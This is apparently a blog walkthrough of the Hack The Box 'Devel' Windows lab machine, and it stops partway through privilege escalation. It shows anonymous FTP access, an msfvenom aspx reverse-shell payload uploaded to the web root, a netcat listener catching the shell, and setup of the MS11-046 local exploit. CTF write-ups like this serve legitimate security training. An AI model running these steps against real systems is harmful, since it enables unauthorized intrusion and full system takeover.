Hi Hackers Welcome Back, Today we are going to look at Hack The Box Devel Machine.
Info Table
Title
Devel
Category
Hack The Box
OS
Windows
Difficulty
Easy
Maker
Kill Chain Summery
While enumerating ports and services we can able to find the service, which is vulnerable MS11-046 which can be easily exploited via publicly available scripts and Metasploit.
β[_]β[atom@atom-vmwarevirtualplatform]β[~]βββ_ $gobuster dir -u http://10.10.10.5 --wordlist /usr/share/wordlists/dirb/common.txt
===============================================================Gobuster v3.1.0
by OJ Reeves (@TheColonial)& Christian Mehlmauer (@firefart)===============================================================[+] Url: http://10.10.10.5
[+] Method: GET
[+] Threads: 10[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s===============================================================2022/06/17 07:09:44 Starting gobuster in directory enumeration mode===============================================================/aspnet_client (Status: 301)[Size: 155][--> http://10.10.10.5/aspnet_client/]===============================================================2022/06/17 07:12:12 Finished===============================================================
The result of gobuster shows some hidden directory, while we get into into says Access denied
Enumeration FTP
While enumeration on ftp NMAP says that anonymous login allowed,
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
ββ[atom@atom-vmwarevirtualplatform]β[~/htb/machines/devil]ββββΌ $ftp 10.129.102.193
Connected to 10.129.102.193.
220 Microsoft FTP Service
Name (10.129.102.193:atom): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
03-18-17 02:06AM <DIR> aspnet_client
03-17-17 05:37PM 689 iisstart.htm
03-17-17 05:37PM 184946 welcome.png
226 Transfer complete.
we can able to see that three files which is aspnet_clientiisstart.htmwelcome.png out of this three file the file name aspnet_client directory looks familiar because the same name directory on gobuster result, let’s go to web and view source code
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><htmlxmlns="http://www.w3.org/1999/xhtml"><head><metahttp-equiv="Content-Type"content="text/html; charset=iso-8859-1"/><title>IIS7</title><styletype="text/css"><!--body{color:#000000;background-color:#B3B3B3;margin:0;}#container{margin-left:auto;margin-right:auto;text-align:center;}aimg{border:none;}--></style></head><body><divid="container"><ahref="http://go.microsoft.com/fwlink/?linkid=66138&clcid=0x409"><imgsrc="welcome.png"alt="IIS7"width="571"height="411"/></a></div></body></html>
Exploiting
On source code we can able to find Welcome.png image which is same image located on FTP now we can clear that the IIS SERVER is hosted on t he ftp shared directory, we already logged in FTP with anonymous user, if we add anything to ftp directory, that added file reflect on web server.
so lets write reverse shell payload in the aspx format, and put the payload into ftp directory, the reson we creating aspx format becouse we have already identified the web technology
1
2
3
4
5
6
7
8
β[_]β[atom@atom-vmwarevirtualplatform]β[~/htb/machines/devil]βββ_ $msfvenom -p windows/shell_reverse_tcp -f aspx LHOST=10.10.14.5 LPORT=8989 -o wrs2.aspx
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of aspx file: 2720 bytes
Saved as: wrs2.aspx
Put Payload into Web Server Directory which is FTP
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
ββ[atom@atom-vmwarevirtualplatform]β[~/htb/machines/devil]ββββΌ $ftp 10.129.102.193
Connected to 10.129.102.193.
220 Microsoft FTP Service
Name (10.129.102.193:atom): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> put wrs2.aspx
local: wrs2.aspx remote: cmdasp.aspx
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
38146 bytes sent in 0.00 secs (42.4987 MB/s)ftp>
Initial Foot Hold
1
2
3
4
5
6
7
ββ[atom@atom-vmwarevirtualplatform]β[~/htb/machines/devil]βββ_ $nc -lvnp 8989listening on [any]8989 ...
connect to [10.10.14.2] from (UNKNOWN)[10.129.96.188]49160whoami
iis apppool\web
PS C:\windows\system32\inetsrv>
Priviledge Escalation
we got initial foot hold right now we are at low priviledge user lets we try to esclate Higher Priviledge for that we use winPEASE.bat file host is on your attacker computer using python3 web server command
Using the information lets google, we can see that the exploits lets we use first exploit which is afd.sys
While we get into the exploit we can able to see that exploit steps and EDB-ID which is searchsploit id
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
################################################################
# Exploit notes:
# Privileged shell execution:
# - the SYSTEM shell will spawn within the invoking shell/process
# Exploit compiling (Kali GNU/Linux Rolling 64-bit):
# - # i686-w64-mingw32-gcc MS11-046.c -o MS11-046.exe -lws2_32
# Exploit prerequisites:
# - low privilege access to the target OS
# - target OS not patched (KB2503665, or any other related
# patch, if applicable, not installed - check "Related security
# vulnerabilities/patches")
# Exploit test notes:
# - let the target OS boot properly (if applicable)
# - Windows 7 (SP0 and SP1) will BSOD on shutdown/reset
################################################################
Update searchsploit to ensure you have all the latest vulnerabilities.
searchsploit -u
Use the -m flag to look for the exploit 40564 and copy it to the current directory.
searchsploit -m 40564
Compile the payload and convert it to .exe format
If you donβt have mingw-w64 installed, install it.
